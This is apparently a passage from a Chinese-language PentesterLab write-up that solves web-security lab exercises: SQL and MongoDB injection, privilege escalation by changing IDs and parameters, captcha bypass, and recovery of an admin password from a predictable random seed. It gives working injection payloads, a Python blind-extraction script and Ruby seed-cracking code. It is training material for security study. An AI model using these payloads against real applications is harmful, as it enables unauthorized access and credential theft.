Mysql2::Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1: SELECT * FROM users WHERE username='1'' AND password='1'
username=' or '1'='1&password=1' or 1=1 limit 1%23&submit=提交查询
Example 3
这里过滤了单引号,我们可以从代码看看
1
2
3
4
params['username'].gsub!("'","")params['password'].gsub!("'","")sql="SELECT * FROM users WHERE username='"+params['username']+"'"sql+=" AND password='"+params['password']+"'"
Mysql2::Error:YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear''' at line 1: SELECT * FROM users WHERE id=1'
sql="SELECT * FROM users WHERE id=#{params[:id]}"@r=ActiveRecord::Base.connection.execute(sql).to_aif@r.size==1name=@r.first[1]sql="SELECT * FROM users WHERE username='#{name}'"@res=ActiveRecord::Base.connection.execute(sql).to_aelseraiseException,"Should only return one user..."
这里应该没什么办法通过 union 进行注入了,由于自己当时陷进去了,一直在想怎么绕 union ,看了文档才发现自己思路太单一了,这里其实有报错回显那就可以用报错注入
In this exercise, you can log in with the following user: user1 with the password “pentesterlab”. Once you logged in and have a play around, log out and try to access the same information.
In this exercise, you can log in with the following user: user1 with the password “pentesterlab”. Once you logged in and have a play around, try to access the information from user2.
这里是个水平越权,也是比较简单,直接抓包顺序查看下一个 infos 就发现了 user2 的了
1
2
3
4
5
6
7
8
9
10
GET/authorization/example2/infos/3HTTP/1.1Host:172.16.71.149User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip, deflateReferer:http://172.16.71.149/authorization/example2/Connection:closeCookie:rack.session=8c8b4862b1564eb97e9c4873e34c60d89409086ae1ecb229303e6715f3e1b69dUpgrade-Insecure-Requests:1
Example 3
In this exercise, you can log in with the following user: user1 with the password “pentesterlab”. Once you logged in and have a play around, try to access the information from user2.
importrequestsimportreimportstringimportbase64index_url='http://172.16.71.149/mongodb/example2/?search='passwd=''whileTrue:foriinstring.ascii_letters+string.digits:payload="admin' %26%26 this.password.match(/^"+passwd+i+"/)//"rep=requests.get(index_url+payload)# print(rep.text)if'admin'inrep.text:passwd+=iprint("[-] find a char:{}".format(passwd))break
Authentication
Example 1
弱口令admin/admin
Example 2
这里以为是社工什么,结果看文档是通过利用密码对比的时间的不同来进行爆破得到密码的。
1
2
3
4
5
6
7
8
9
10
11
GET/authentication/example2/HTTP/1.1Host:172.16.71.149User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip, deflateReferer:http://172.16.71.149/Connection:closeCookie:rack.session=0dbcdabae0f95432d8fa96ebf7103952ba2f82590bc454db88cb00b400b1d3fbUpgrade-Insecure-Requests:1Authorization:Basic aGFja2VyOmhhY2tlcg==
GET/authentication/example3/HTTP/1.1Host:172.16.71.149User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip, deflateConnection:closeCookie:user=adminUpgrade-Insecure-Requests:1
GET/authentication/example4/HTTP/1.1Host:172.16.71.149User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip, deflateReferer:http://172.16.71.149/authentication/example4/?username=user1&password=admin&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2Connection:closeCookie:user=24c9e15e52afc47c225b757e7bee1f9d;Upgrade-Insecure-Requests:1Cache-Control:max-age=0
新增了一个 Modify your profile 的功能,那就是在这个 api 上user[admin]=1就行了
Example 3
In this exercise, you can log in with the following user: user1 with the password “pentesterlab”. Once you logged in, try to access the information fromt the company “Company 2”.
跟之前差不多,只不过这次 edit 加上user[company_id]=2即可
Captcha
感觉这个系列压根没想让你揉眼看出验证码…
Example 1
删掉captcha请求参数即可
1
2
3
4
5
6
7
8
9
10
GET/captcha/example1/submit?submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2HTTP/1.1Host:172.16.71.149User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip, deflateReferer:http://172.16.71.149/captcha/example1/Connection:closeCookie:rack.session=525baf022ef804ebce727262500c3074f121064d31acccf75fc07532bf37e54dUpgrade-Insecure-Requests:1
Example 2
在请求头看到答案
1
2
3
4
5
6
7
8
9
10
GET/captcha/example2/submit?captcha=1&answer=EDtRmsPHWz&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2HTTP/1.1Host:172.16.71.149User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip, deflateReferer:http://172.16.71.149/captcha/example2/Connection:closeCookie:rack.session=525baf022ef804ebce727262500c3074f121064d31acccf75fc07532bf37e54dUpgrade-Insecure-Requests:1
Example 3
在 cookie 中可以看到
1
2
3
4
5
6
7
8
9
10
GET/captcha/example3/submit?captcha=1&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2HTTP/1.1Host:172.16.71.149User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip, deflateReferer:http://172.16.71.149/captcha/example3/Connection:closeCookie:captcha=C%5DjhO%5DEL%5B%5B; rack.session=525baf022ef804ebce727262500c3074f121064d31acccf75fc07532bf37e54dUpgrade-Insecure-Requests:1
In this exercise, you can log in with the following user: “hacker” with the password “hjtvse”. Your user is the second one that has been created for this application and you retrieved the following source code:
In this exercise, you can log in with the following user: “hacker” with the password “afxabo”. Your user is the second one that has been created for this application and you retrieved the following source code:
timestamp=(Time.now.to_f).to_iseed=Random.new(timestamp)pass_admin=6.times.map{('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)]}.joinpass_hacker=6.times.map{('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)]}.joinwhilepass_hacker!="afxabo"dotimestamp=timestamp-1seed=Random.new(timestamp)pass_admin=6.times.map{('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)]}.joinpass_hacker=6.times.map{('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)]}.joinendputs"Password of admin: "putspass_admin#vqcpux
得到 admin 密码
Example 3
In this exercise, you can log in with the following user: “hacker” with the password “xgyymbghxo".Your user is the second one that has been created for this application and you retrieved the following source code:
In this exercise, you can log in with the following user: “hacker” with the password “wtpwnl”. Your user is the second one that has been created for this application and you retrieved the following source code:
n=1000seed=Random.new(0)n.times{seed.rand(5)}pass_admin=6.times.map{('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)]}.joinpass_hacker=6.times.map{('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)]}.joinwhilepass_hacker!="wtpwnl"don=n-1seed=Random.new(0)n.times{seed.rand(5)}pass_admin=6.times.map{('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)]}.joinpass_hacker=6.times.map{('a'..'z').to_a[seed.rand(('a'..'z').to_a.size)]}.joinendputs"Password de admin: "putspass_admin